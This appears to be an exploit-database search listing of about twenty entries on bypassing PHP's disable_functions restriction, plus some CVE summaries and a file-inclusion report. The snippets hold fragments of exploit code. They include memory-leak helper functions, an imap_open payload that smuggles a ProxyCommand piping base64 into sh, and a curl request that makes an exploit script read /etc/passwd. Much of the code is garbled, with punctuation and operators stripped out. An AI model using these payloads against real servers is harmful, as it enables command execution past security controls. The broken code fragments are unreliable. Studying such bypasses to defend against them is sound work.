40 matches found
PHPUnit has Argument injection via newline in PHP INI values that are forwarded to child processes
Impact: PHPUnit forwards PHP INI settings to child processes used for isolated/PHPT test execution as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newli...
PHP 7.4 FFI disable_functions Bypass
?php / FFI Exploit - uses 3 potential BUGS. PHP was contacted and said nothing in FFI is a security issue. Able to call system$cmd without using FFI::load or FFI::cdefs BUG 1 maybe intended, but why have any size checks then? no bounds check for FFI::String when type is ZENDFFITYPEPOINTER...
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass
a; $backtrace = new Exception-getTrace; ; if!isset$backtrace1'args' PHP = 7.4 $backtrace = debugbacktrace; class Helper public $a, $b, $c, $d; function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$...
PHP 7.0 7.4 (Unix) - debug_backtrace disable_functions Bypass
PHP 7.0 7.4 Unix - debugbacktrace disablefunctions Bypass a; $backtrace = new Exception-getTrace; ; if!isset$backtrace1'args' PHP = 7.4 $backtrace = debugbacktrace; class Helper public $a, $b, $c, $d; function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8;...
PHP 7.3 disable_functions Bypass
= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...
PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass
= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...
PHP 7.x disable_functions Bypass
= 8; public function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8; return $out; unable to leak ro segments public function leak1$addr global $spl1; $this-write$this-abc, 8, $addr - 0x10; return strlengetclass$spl1; the real deal public function leak2$addr, $p...
PHP 5.2.3 imap (Debian Based) - imap_open disable_functions Bypass
PHP 5.2.3 imap Debian Based - imapopen disablefunctions Bypass /tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...
PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass
/tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...
Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass
Exploit Title: PHP Imagick disable_functions Bypass Date: 2016-05-04 Exploit Author: RicterZ Vendor Homepage: https://pecl.php.net/package/imagick Version: Imagick = 5.4 Test on: Ubuntu 12.04 Exploit: $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" Disable functions:...
Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass
Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass. Exploit Title: PHP Imagick disable_functions Bypass Date: 2016-05-04 Exploit Author: RicterZ Vendor Homepage: https://pecl.php.net/package/imagick Version: Imagick = 5.4 Test on: Ubuntu 12.04 Exploit: $ curl...
CVE-2007-5424
The disable_functions feature in PHP 4 and 5 allows attackers to bypass intended restrictions by using an alias, as demonstrated by using ini_alter when ini_set is disabled...
PHP 5.5.9 - zend_executor_globals CGIMode FPM WriteProcMemFile disable_functions Bypass Load Dynamic Library
PHP 5.5.9 - zendexecutorglobals CGIMode FPM WriteProcMemFile disablefunctions Bypass Load Dynamic Library ?php // EDB Note: Paper https://www.exploit-db.com/docs/english/38104-shoot-zendexecutorglobals-to-bypass-php-disablefunctions.pdf errorreporting0x66778899; settimelimit0x41424344;...
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
Exploit Title: PHP 5.x Shellshock Exploit bypass disable_functions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror Version: 5. tested on 5.6.2 Tested on: Debian 7 and CentOS 5 an...
Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability
No description provided by source. Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion http://vhcp.verlihub-project.org/ Bug Found By Methodman From TEAMELITE - dchub.nemesis.te-home.net:4120 Bug: Line: 27 - inisetmagicquotesgpc,1; ............................ Line: 71 - $pagename =...
PHP 4.0.x, 5.0.0 disable_functions Feature Security Bypass Vulnerability
No description provided by source...
Directory traversal
Directory traversal vulnerability in autoinstall4imagesgalleryupgrade.php in the Fantastico De Luxe Module for cPanel allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the scriptpathshow parameter in a GoAhead action. NOTE: this issue only...
Design/Logic Flaw
The Component Object Model (COM) functions in PHP 5.x on Windows do not follow safe_mode and disable_functions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control...
CVE-2007-5653
The CVE-2007-5653 entry concerns PHP 5.x on Windows where COM functions do not honor safe_mode or disable_functions, enabling context-dependent bypass of intended restrictions. The description cites concrete examples related to com_load_typelib and interactions with ActiveX/Windows components suc...
PHP 5.x COM - Safe Mode / disable_functions Bypass
sounds good //The windows version of PHP has built in support for this extension. You do not need to //load any additional extension in order to use these functions. //You are responsible for installing support for the various COM objects that you intend //to use such as MS Word; we don't and can...